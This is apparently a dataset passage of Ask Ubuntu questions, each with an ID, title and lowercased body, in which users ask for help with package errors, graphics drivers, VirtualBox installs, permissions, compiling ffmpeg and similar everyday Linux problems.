disk full error dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.5.0-32-generic /boot/vmlinuz-3.5.0-32-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-3.5.0-32-generic_3.5.0-32.53_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) root @ zotac : ~ # i have 250 gb of space left , but the boot partition is 95 % full . but now i can not use apt-get anymore , because it 's stuck with that package it ca n't install . also , apt-get autoremove and apt-get clean do n't help . how can i reset apt so this error is gone ? so i can remove the old linux-images and install the new one ?
304238	the infamous nvidia black screen	so , i 've done many many different installations of linux and hit this road block every time . though , this time , it is really turning into a pain . i have indeed tried every common method so far , so do n't ask if i did . i tried installing the ones that ubuntu provides , i reboot ... black screen ( with backlight on ) . i tried the x-swat ones , ( which i had to use in the past to make it work ) same thing- black screen with the backlight on . i installed the binary drivers from the official page , and after jumping through a million hoops to finally get nouveau to not load ... . black screen ! hooray ! this is really a wonderful birthday present lol . in all seriousness , here are a few specs : specs you probably wont need : i5 3570k 16gb ram 120gb ssd asrock extreme4 z77 specs that are actually important : nvidia gtx 660 ti ubuntu 13.04 , 64 bit current ( also non working ) driver : 319.23 my xorg.conf looks like this ( ran nvidia-xconfig ) : http : //pastebin.com/u01c5hsw and i added nouveau to blacklist.conf in modprobe.d after all of this i can only get the desktop environment to start normally in a failsafe x , under recovery . and at that point , things start acting weird ( my steam which was working before this fiasco , now ca n't find it 's 32bit libraries which i selected to install with the nvidia driver and i know are there ) so yeah , with all of that , can anyone tell me what the heck im doing wrong =p ive had one problem after another this time around , almost bricked my harddrives because of a messy uefi issue that popped up ( unrelated to this , but still took half a day to clear up ) . i know it 's a duplicate , ive been searching the same question for hours , but none of them have worked . but , i dont really want to give up on this . i 'm a gamer gosh darn it !
304240	problems installing ubuntu in virtualbox	iâ´m trying to install ubuntu on my pc , so i can work with cnc software available only in linux . i installed virtualbox to do this , i created my virtual machine following the steps , and i installed ubuntu from the file that i downloaded from the ubuntu webpage . i went through the installation procedure up to the part where i restarted the machine . after i did so , the machine restarted , but then gave me a message saying that the systems is running in low graphics mode . it gave me various options , but nothing worked . after a while of fidgeting with it , it took me to a login page with only commands , but nothing i typed worked . can anybody help me go through the installation , or help me solve this problem ?
304241	tips for creating a kid-friendly , secure environment for ubuntu 12.10 ?	keep in mind i 'm already aware of edubuntu , doudou , and other child-friendly ubuntu operating systems , but i am interested in knowing some of the top tips to lock-down my ubuntu 12.10 distro for sole-use of my after school program . some things i 'd like to do but do not know how : create links on the desktop to visit certain approved webpages , but while also having the address bar locked and the history and bookmarks locked as well ( no way to visit outside websites ) . i understand this would be the most difficult aspect , especially since i ca n't directly access my work 's router . i can live without internet , but i really would like them to utilize sites like khan academy . create a computer-use timer that could log someone out automatically . ( to initiate the clock i would have a giant start button on the desktop . i 'm also looking for some suggestions on games/software that are educational and fun : ) thanks !
304242	how to get r/w permission for a directory for a particular user ?	in my ubuntu server a directory named `` softwares '' is shared via samba for windows clients . the directory has only read permission . i am the system admin working on the ubuntu server . i am also not allowed to modify any contents inside the `` software '' directory . i need read write permission . how to get read write permission for that particular directory . may i use sudo command ? . and one important thing the permission of others needs to be read only .
304244	how to select ubuntu at startup ?	i 've installed ubuntu 11.04 on my xp inside windows through image file.but i 'm not able to select ubuntu at startup because theselection screen appears only for a fraction of a second .
304248	unable to install mysql natty-security issue	i am running a ubuntu 11.04 on my system . trying to uninstall mysql server from the terminal : sudo apt-get install mysql-server but it fails with the following set of errors : reading package lists ... done building dependency tree reading state information ... done the following extra packages will be installed : libdbd-mysql-perl libdbi-perl libhtml-template-perl libmysqlclient16 libnet-daemon-perl libplrpc-perl mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server-5.1 mysql-server-core-5.1 suggested packages : libipc-sharedcache-perl tinyca mailx the following new packages will be installed : libdbd-mysql-perl libdbi-perl libhtml-template-perl libmysqlclient16 libnet-daemon-perl libplrpc-perl mysql-client-5.1 mysql-client-core-5.1 mysql-common mysql-server mysql-server-5.1 mysql-server-core-5.1 0 upgraded , 12 newly installed , 0 to remove and 258 not upgraded . need to get 23.7 mb/23.8 mb of archives . after this operation , 60.9 mb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! mysql-common libnet-daemon-perl libplrpc-perl libdbi-perl libmysqlclient16 libdbd-mysql-perl mysql-client-core-5.1 mysql-client-5.1 mysql-server-core-5.1 mysql-server-5.1 libhtml-template-perl mysql-server install these packages without verification [ y/n ] ? y err http : //in.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-common all 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty/main libdbi-perl amd64 1.612-1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-common all 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty/main libdbd-mysql-perl amd64 4.016-1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main libmysqlclient16 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-client-core-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-client-core-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-client-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-client-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-server-core-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-server-core-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-server-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-server-5.1 amd64 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty/main libhtml-template-perl all 2.9-2 404 not found [ ip : 91.189.91.14 80 ] err http : //in.archive.ubuntu.com/ubuntu/ natty-updates/main mysql-server all 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] err http : //security.ubuntu.com/ubuntu/ natty-security/main mysql-server all 5.1.63-0ubuntu0.11.04.1 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-common_5.1.63-0ubuntu0.11.04.1_all.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libd/libdbi-perl/libdbi-perl_1.612-1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/libmysqlclient16_5.1.63-0ubuntu0.11.04.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libd/libdbd-mysql-perl/libdbd-mysql-perl_4.016-1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client-core-5.1_5.1.63-0ubuntu0.11.04.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-client-5.1_5.1.63-0ubuntu0.11.04.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-core-5.1_5.1.63-0ubuntu0.11.04.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server-5.1_5.1.63-0ubuntu0.11.04.1_amd64.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //in.archive.ubuntu.com/ubuntu/pool/main/libh/libhtml-template-perl/libhtml-template-perl_2.9-2_all.deb 404 not found [ ip : 91.189.91.14 80 ] failed to fetch http : //security.ubuntu.com/ubuntu/pool/main/m/mysql-5.1/mysql-server_5.1.63-0ubuntu0.11.04.1_all.deb 404 not found [ ip : 91.189.91.14 80 ] e : unable to fetch some archives , maybe run apt-get update or try with -- fix-missing ? little bit of poking around on the internet led me here which informs me that karmic-security is now gone and i need to update mirror in /etc/apt/sources.list . am a novice in ubuntu and not sure whether to update that list as instructed . is there any alternate solution ? please advice .
304253	problem starting ubuntu	when i start ubuntu it shows a black screen like the terminal and says checking battery size ... and then it says daniel login : and then password : what to do ? i restarted the computer but its still the same problem . is there any command to go back to the desktop ?
304254	how to fix oserror : [ errno 1 ] operation not permitted ( when opening file with sublime text 2 )	after installing sublime text 2 using the following code : sudo add-apt-repository ppa : webupd8team/sublime-text-2 sudo apt-get update sudo apt-get install sublime-text ( slighlty relevant ) i attempted to open a file and got a permissions error . after using chmod to get permission on the folder that was giving me issues , a new error occurred . ( only relevant because i 'm not sure why this was a problem in the first place , so i 'm not sure if it is related . ) after doing that and attempting to open any file ( from the gui ) and i receive the following error : unable to run package setup : traceback ( most recent call last ) : file `` ./packagesetup.py '' , line 165 , in upgrade upgradepackage ( pkg , pristinedir , datadir , backupdir ) file `` ./packagesetup.py '' , line 158 , in upgradepackage os.path.join ( backupdir , base ) , inhibitoverwrite ) file `` ./packagesetup.py '' , line 113 , in upgradearchive shutil.copy ( src , dst ) file `` .\shutil.py '' , line 89 , in copy file `` .\shutil.py '' , line 66 , in copymode oserror : [ errno 1 ] operation not permitted : '/home/rubix/.config/sublime-text-2/pristine packages/applescript.sublime-package' any ideas as to what is going wrong/how to fix it ?
304262	how to use custom cursor ?	i just switched to ubuntu from windows and i had made a custom cursor for myself on windows and i 'm trying to use that same one on ubuntu . all i can find is something about a cursor theme , but not where i can just put the individual cursor image . @ . @ ; cursor i 'm trying to use : https : //www.dropbox.com/s/rmaxlumwxq58bmn/normal.ani thank you .
304265	how do i run ubuntu after unzipping download on usb drive	i went to the penlinux download site and did not see the screen as shown on the ubuntu site , so i wen to the down load page on ubuntu downloaded the desktop in a zip file to a usb stick drive unzipped the file , now how do i run ubuntu from this stick drive
304269	how can i unmount user-mounted disks under /media/ $ username from the command-line ?	in xubuntu 12.10 , i can mount external disks that are attached and they appear under /media/ $ username/ $ diskname . i can unmount them by going to the desktop , right-clicking , waiting 6 seconds or so , and clicking eject volume - or by opening gnome-disks and clicking on stop on the disk icon . however , i 'd far prefer to simply run umount /media/ $ username/ $ diskname from the command-line . this currently requires sudo rights , or for me to add each disk to the fstab - since the whole point of this is automatically mounting previously-unseen disks , that wo n't work generally . how can i configure the rights/etc to be able to umount automatically mounted disks ? i am the right user after all ...
304270	alternative to jupiter applet	wondering if anyone knows of any alternative to the jupiter applet that stopped being actively developed ? i found this , but it 's all i could find : http : //itsfoss.com/solve-overheating-issue-battery-life-ubuntu-1304/
304274	why recent items are not being deleted even using the privacy app in unity ?	i wanted to remove certain things from the recent folder and used the privacy app as indicated on this site . however , nothing has changed . the files are still in the folder and , even though i changed the settings to not track certain files , it still does . help ? i 'm using ubuntu 13.04 if that helps .
304275	create and install my own mouse cursor - fixed	i am interested in finding out how to install my own mouse designs . this could be used to brand a company computer , make a mouse pointer easier to use or , just for fun . is there a tool to create them with ( i use gimp ) ? is there a format to save them in ( png , gif , ani , cur ) ? where are the mouse pointers stored in the file system ? i have created my own theme following these easy instructions , but this does n't include mouse pointer options .
304277	how do i insert umlaut on the u in ubuntu ?	i have already activated the compose key ( left ctrl ) . according to all the forums i have to punch in compose , followed by `` '' u '' . this is what i get as a result : â´u' i am really stuck here . any help will be most appreciated .
304281	blue-striped boot screen after uninstall gnome	i installed gnome 3.8 like in link ( http : //www.omgubuntu.co.uk/2013/04/gnome-3-8-ppa-for-ubuntu-gnome ) is described . i installed it , did n't liked it so uninstalled it as there is written . i had some problems with login session which i solved but booting screen is no more purple with ubuntu logo but blue with strippes . and i think my pc is little slower . is here anybody who knows how to change this booting screen ?
304293	how to start fresh chromium instance ?	i am testing web applications . i therefor always need a browser that does not have any cookies , saved logins , etc . put shortly : a fresh instance . as we just work with chromium , i wonder how to start such an fresh instance . i do n't want to set up my regular chromium installation to not save cookies and such . i want an extra instance .
304296	unable to install php5-dev package in ubuntu 12.10	i am unable to install php5-dev package in ubuntu 12.10 . i am getting the following on sudo apt-get install php5-dev : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package php5-dev
304297	sometimes ( quite frequently ) chromium does n't start up	i 've been having a problem with the chromium browser.sometimes when i want to open it , i click on it , the icon appears at the bottom of the screen , the pointer shows that the browser is loading and after 15 second nothing happens and the icon at the bottom of the screen dissapears . when this happens , the only way to fix it temporarily is to open chromium many times ( does n't matter if it 's all at once or not ) .after that , it works normally for a while ... then it starts acting again and i need to repeat the process . do n't know if it 's relevant , but i 'm using kde on ubuntu 13.04 . any way of solving this ? thanks in advance .
304298	how to manually re-saturate a window after it has been unresponsive	when ubuntu detects that an application is unresponsive , the window loses colour and shows gets a somewhat 'dimmed ' appearance . normally once the application starts responding again the colour comes back and it no longer looks dimmed . occasionally the application becomes responsive again but for some reason ubuntu does n't seem to notice , and the window stays desaturated . if i remember correctly i think this has happened particularly with firefox , thunderbird and libreoffice but i 'm guessing it could happen to any application . is there any way to manually restore the saturation without closing and re-opening the application ? if i use the menu to open a new window of the same application ( e.g . new window in firefox , or even if i just open help - > about ) , the colour is fine on the new window that pops up , it 's only the window that was open when the application stopped responding that is 'stuck ' in the dimmed state .
304299	ubuntu 13.04 can not connect to scanner	upgraded from ubuntu 12.10 to 13.04 . scanner hp cm1312 mfp worked flawlessly , untill upgrade . after upgrade ´unable to connect to scanner´ , both in ´simple scan´ and ´gscan2pdf´ . could this bug be fixed in a next update , or else ? i am not a tech , so please forward your simple solution : - )
304300	how to ip forward only between 2 interfaces out of 3 installed ?	i 'm using ubuntu 12.04 . there are 3 nic on my pc but i wish to do ip forward only on 2 of them that act as a router . the 3rd nic need to be separated from the other 2 and not be able to see the transportation of the router . is there a way to operate ip_forward only on 2 nic and not on all 3 ? could i use routing table instead to do the same instead of ip_forward ?
304301	missing applications in `` open with ... aplications '' menu	after installing certain applications i ca n't get them to show up under open with from the right-click context menu when i right click on a file.if i click on the other application ... from the context menu and click on the show other applications i ca n't find them on the list . is there a way to manually add applications to this menu ?
304305	can not compile ffmpeg with fdk-aac	i need to compile ffmpeg with libfdk-aac on ubuntu 13.04 . i followed the following instructions to compile libfdk-aac wget http : //downloads.sourceforge.net/opencore-amr/fdk-aac-0.1.0.tar.gz tar xzvf fdk-aac-0.1.0.tar.gz cd fdk-aac-0.1.0 ./configure make sudo checkinstall -- pkgname=fdk-aac -- pkgversion= '' 0.1.0 '' -- backup=no -- deldoc=yes \ -- fstrans=no -- default ldconfig i followed the following instructions to compile ffmpeg git clone -- depth 1 git : //source.ffmpeg.org/ffmpeg cd ffmpeg ./configure -- enable-gpl -- enable-libfaac -- enable-libmp3lame -- enable-libopencore-amrnb \ -- enable-libopencore-amrwb -- enable-librtmp -- enable-libtheora -- enable-libvorbis \ -- enable-libvpx -- enable-libx264 -- enable-nonfree -- enable-version3 -- enable-libaacplus \ -- enable-x11grab -- enable-libfdk-aac make sudo checkinstall -- pkgname=ffmpeg -- pkgversion= '' 5 : $ ( date + % y % m % d % h % m ) -git '' -- backup=no \ -- deldoc=yes -- fstrans=no -- default hash x264 ffmpeg ffplay ffprobe problem while compiling ffmpeg , in the ./configure line , it fails with the error : error : libfdk_aac not found the last lines of config.log are : gcc -wl , -- as-needed -o /tmp/ffconf.w9wba0c3 /tmp/ffconf.fw03yjzi.o -lfdk-aac -lfaac -laacplus -lm -pthread -lz /usr/local/lib/libfdk-aac.so : undefined reference to `ceil' /usr/local/lib/libfdk-aac.so : undefined reference to `atan2' /usr/local/lib/libfdk-aac.so : undefined reference to `acos' /usr/local/lib/libfdk-aac.so : undefined reference to `sin' /usr/local/lib/libfdk-aac.so : undefined reference to `atan' /usr/local/lib/libfdk-aac.so : undefined reference to `exp' /usr/local/lib/libfdk-aac.so : undefined reference to `tan' /usr/local/lib/libfdk-aac.so : undefined reference to `cos' /usr/local/lib/libfdk-aac.so : undefined reference to `log' /usr/local/lib/libfdk-aac.so : undefined reference to `pow' /usr/local/lib/libfdk-aac.so : undefined reference to `sqrt' /usr/local/lib/libfdk-aac.so : undefined reference to `floor' collect2 : error : ld returned 1 exit status error : libfdk_aac not found all the other libraries were installed . it works fine without -- enable-libfdk-aac flag . i just heard that fdk-aac is the best aac encoder , so i wanted to install that with ffmpeg if possible . ps : the exact steps i followed for the whole process is in https : //gist.github.com/abhi92/5711831 . i installed every library in that list .
304308	update package which has newer versions in repos but ca n't be found in backports ?	while doing some coding with taglib-ruby ( which requires taglib ( http : //taglib.github.io/ - sorry , i 'm not allowed to post more than 2 links.. ) ) , i came across a strange problem and after a few days found out that this apparently has been fixed in taglib 1.7.2 . however , as i 'm using ubuntu 12.04 , the newest available libtag1-dev package is of version 1.7.1 . i tried updating it using precise-backports but no such package can be found there . i 'm pretty new to ubuntu and linux at all , so is there any way to get a newer version ( which seems to be available for versions > 12.04 ) from the repos ? if not , what would be the `` best '' way to upgrade the library so i can use it with taglib-ruby ?
304311	how to install third party softwares from ubuntu installation cd after installation ?	i accidentally unchecked the option to install third party proprietary softwares like mp3 codec during the installation of ubuntu . now i want to install them again . is there any way to installing it from the cd instead of downloading the whole restricted extras package . i am from a remote village with only 128 kbps dialup modem .
304314	script for remove files using ssh	i have a script that uses scp to backup some files of my pc into another pc connected in lan , something like that : # ! /bin/bash scp some_directories host @ ip-address : backupfolder/ i use a public key so it works without insert any password , i have just to execute it . the problem is that if i backup some file from my pc and then i remove it ( from my pc not from the remote one ) , when i execute this script again it copy the new files and overwrites the existing ones but does not remove the previous backuped files that are no longer present in my pc . so i need a way to remove files in the remote pc via some script . the only way i know is to login in with ssh host @ ip and then to use rm but clearly i ca n't write a script like this : # ! /bin/bash ssh host @ ip-address rm -r backupfolder/ because in this way the rm command look for the backupfolder in my pc and not in the remote one .
304321	machine stops suddenly , only hard reset can help	it is happens sometimes , im just working and suddenly machine starts lagging . then it can totaly stops ( nothing works , mouse , keyboard etc . ) , or sometimes not . jun 5 16:04:12 c0rp kernel : [ 2636.897221 ] cpu1 : package power limit normal jun 5 16:04:12 c0rp kernel : [ 2636.897222 ] cpu3 : package power limit normal jun 5 16:04:12 c0rp kernel : [ 2636.897224 ] cpu2 : package power limit normal jun 5 16:04:12 c0rp kernel : [ 2636.897225 ] cpu0 : package power limit normal jun 5 16:05:01 c0rp cron [ 6655 ] : ( root ) cmd ( command -v debian-sa1 > /dev/null & & debian-sa1 1 1 ) jun 5 16:10:26 c0rp kernel : imklog 5.8.6 , log source = /proc/kmsg started . jun 5 16:10:26 c0rp rsyslogd : [ origin software= '' rsyslogd '' swversion= '' 5.8.6 '' x-pid= '' 1267 '' x-info= '' http : //www.rsyslog.com '' ] start this is whats inside syslog quite before hard reset ( command -v debian-sa1 > /dev/null & & debian-sa1 1 1 ) may be this is my problem ? uname -a linux c0rp 3.8.6-030806-generic # 201304051406 smp fri apr 5 18:07:42 utc 2013 x86_64 x86_64 x86_64 gnu/linux also just before lagging iowait are up my laptop : asus zenbook ux32dv , ubuntu 12.10 sorry for my poor english edit 1 : according to the jnv answer i remove sysstat package . the problem still exists , but now my computer does n't stops totally . iowait very high , machine lagging and sometimes stops for 20-30 sec . i 'm still trying to find a culprit . my hdd is healthy ( smart data and test utility said ) . sometimes in iotop output there is kswapd0 causing 80-90 % iowait . edit 2 : according last jnv answer . yesterday i upgraded my 12.10 to 13.04 . today everything was normal . no iowaits , no lagging . i explain a little bit my configuration on laptop . my / and /boot are on ssd . also 2 2gb swap files on ssd . swappiness is 10 . /home on hdd . zram is installed , i have 4 zram partitions . also i ordered one 8gb ram , and later plan to buy 256gb ssd and change hdd . if someone intersted here is good howto article . its in german but google can help .
304323	ubuntu taking long time to boot ,	i have tried disabling legacy usb , please let me know of any solution . http : //www.heypasteit.com/clip/0u0p
304324	how to restore healthy unity after incomplete update	i updated my ubuntu and while it was restarting command line appeared and froze , then i forced shutdown pc and when ubuntu booted again , i saw unity is corrupted . launcher and menus disappeared but alt+ctrl+t and righ-click menu works . also i can open firefox and other apps through terminal . this is how my current desktop :
304326	why wont ubuntu let me download microsoft products	i would like to download microsoft 8 to evaluate . why will ubuntu not run the windows setup.exe file . any help would be really appreciated
304336	problem after logging screen . ubuntu 13.04	i have some problem with my ubuntu 13.04 , after installing it with oracle vm virtual box . so , after i have installed it , i reboot my virtual machine , and i saw the log - in screen . but when i typed my login and password , the screen became dark and i got this error 'the system is running in low-graphics mode ' . to solve this problem , i have found many information on different forums . using this link how to fix `` the system is running in low-graphics mode '' error ? i tried to install the driver on my video card . it should be noted , that i have two videocards on my laptop : amd radeon hd hd7670m simple intel video card so , firstly i tried to install ati drivers . and after logging in screen i could see the standart wallpaper of ubuntu , also i could click the right button on the mouse standart menu was opened , where i could choose one of this : create a folder , create a document , change the wallpaper etc . but nothing else ! ! ! when i tried to install the intel drivers , i got the same result . what is the problem ? please , try to help me !
304338	ca n't view wifi signal strength with iwconfig or wavemon	i have been reading everywhere that i should be able to view wifi signal strength using iwconfig or wavemon but i am not getting that information when i use either of them . i can connect to wifi , and the signal strength icon with the bars in gnome3 works fine , but i want more specific information . here is what happens when i use iwconfig : lo no wireless extensions . eth1 ieee 802.11abg essid : '' wifi_router '' mode : managed frequency:2.437 ghz access point : 82:0c : e5:2v:7e:48 retry long limit:7 rts thr : off fragment thr : off power management : off eth0 no wireless extensions . when using wavemon i get mostly the same info but in the levels area , it says no interface data . i assume this is where i should be able to view the signal strength . what can i do to make the signal strength show up ? thanks .
304340	apt-get 403 forbidden	i 've start a new job today and i am trying to set up my machine to run through their windows server . i 've managed to get a internet connection through the server now but now i ca n't run apt-get update as i get a `` 403 forbidden '' error . this is for every repo under my source list , apart from translations ( ? ) . i do have a proxy in apt.conf , if i do n't have it i get a 407 permission denied error . here 's my apt.conf file ( i have omitted my username and password ) acquire : :http : :proxy `` http : //username : password @ 192.168.0.2:8080/ '' ; here 's my sources.list # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/main/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / dists/precise/restricted/binary-i386/ # deb cdrom : [ ubuntu 12.04.2 lts _precise pangolin_ - release amd64 ( 20130213 ) ] / precise main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise universe deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise multiverse deb http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-updates multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //gb.archive.ubuntu.com/ubuntu/ precise-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu precise partner # deb-src http : //archive.canonical.com/ubuntu precise partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main i can sort-of fix this by changing all the http in sources.list to ftp but i still have issues with ppas
304341	how can i partition my ubuntu ?	i install ubuntu , i am dual booting windows and ubuntu , i am using 500 gb hdd , ubuntu is given 10 gb only . any possibility if i move some windows space to ubuntu ? thanks
304343	i ca n't start deluge with init.d with the ability to log	i try to set fail2ban to ban ip which mistype my password on the deluge-web interface , but i have a problem with the logging . i try to set deluge to log the errors according to this website : http : //forum.deluge-torrent.org/viewtopic.php ? f=7 & t=42659 after the second step , when i modified the startup script , i tried to start the deluge-daemon to see if the logging was working , it seemed to be running , but in fact i ca n't reach the deluge-webui . however i start the deluged and the deluge-web manually , it works ! why ca n't the init.d script start the deluge-web correctly , when from the terminal it works like a charm ?
304345	where does the alt+f2 use as the current working directory ?	suppose i have /home/myusername/somedir/somefile . when i use alt+f2 and type gedit ~/somedir/somef < tab > it can tab complete this for me to gedit ~/somedir/somefile . but then i run the command , and it does n't open my file it is just a blank editor . on the other hand , if i use gedit somedir/somef < tab > it does n't complete , and neither does gedit ./somedir/somef < tab > , but if i fill in the ... ile and then run the command , it does load up my file contents . this seems inconsistent , where does alt+f2 actually start from ?
304350	freenx server , with nomachine nxclient - i can not disconnect , only log out	i used this guide http : //www.drivard.com/2012/06/installation-freenx-server-ubuntu-12-04-lts-precise/ to install freenx and it is working fine apart from 1 thing . i ca n't seem to be able to disconnect from sessions . if i try to close ( from the 'x ' button top right ) a nxsession from the client pc nothing will happen . in other setups where i use nx to forward desktops sessions , i would get a gtk , or ncurses windows asking me if i want to terminate ( =log out ) , or disconnect from the session . in this case nothing happens when i press 'x ' , and i can only choose to log out from the session ( as i would locally ) .
304360	error running sudo apt-get -f install	i 'm trying to remove a package : sudo apt-get remove pgbouncer but then i got the following error : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : linux-server : depends : linux-image-server ( = 3.2.0.44.53 ) but 3.2.0.45.54 is to be installed depends : linux-headers-server ( = 3.2.0.44.53 ) but 3.2.0.45.54 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . the i tried sudo apt-get -f install but then i get : reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-38 linux-image-3.2.0-38-generic libpgpool0 linux-headers-3.2.0-38-generic use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-server the following packages will be upgraded : linux-server 1 upgraded , 0 newly installed , 0 to remove and 60 not upgraded . 1 not fully installed or removed . need to get 0 b/1,732 b of archives . after this operation , 0 b of additional disk space will be used . do you want to continue [ y/n ] ? dpkg : dependency problems prevent configuration of linux-server : linux-server depends on linux-image-server ( = 3.2.0.44.53 ) ; however : version of linux-image-server on system is 3.2.0.45.54. linux-server depends on linux-headers-server ( = 3.2.0.44.53 ) ; however : version of linux-headers-server on system is 3.2.0.45.54. dpkg : error processing linux-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : linux-server e : sub-process /usr/bin/dpkg returned an error code ( 1 ) how can i get this annoying problem fixed ?
304361	is nitroshare transfer limited to a certain file size ?	i have recently seen nitroshare promoted on this site and have installed it in ubuntu ( xubuntu 12.10 ) and win7 . i was able to transfer files but only up to a certain size . i have not tested with very large files , up to 60 mb it worked , but an archive of about 360 mb was not successfully transferred . while a folder of 128mb was sent , a zip archive of the same folder was not , crashing the sending application . i see here that in fact the free version is the lite one , with clear limitations . what does that mean exactly ? i guess that the bandwidth is limited here , not the file size to be transferred . i see the limitation considered here as a bug , in relation to a limit representing `` anything larger than about one-half the amount of memory your computer has '' . but if that 's the ram , even the bugged limit is far larger than what i 've experienced . what is the real limit - so that i would not bother transferring something that is too large ? also , i do not see any progress bar in the `` share box '' on the desktop as supposed and illustrated here , not even when the transfer works .
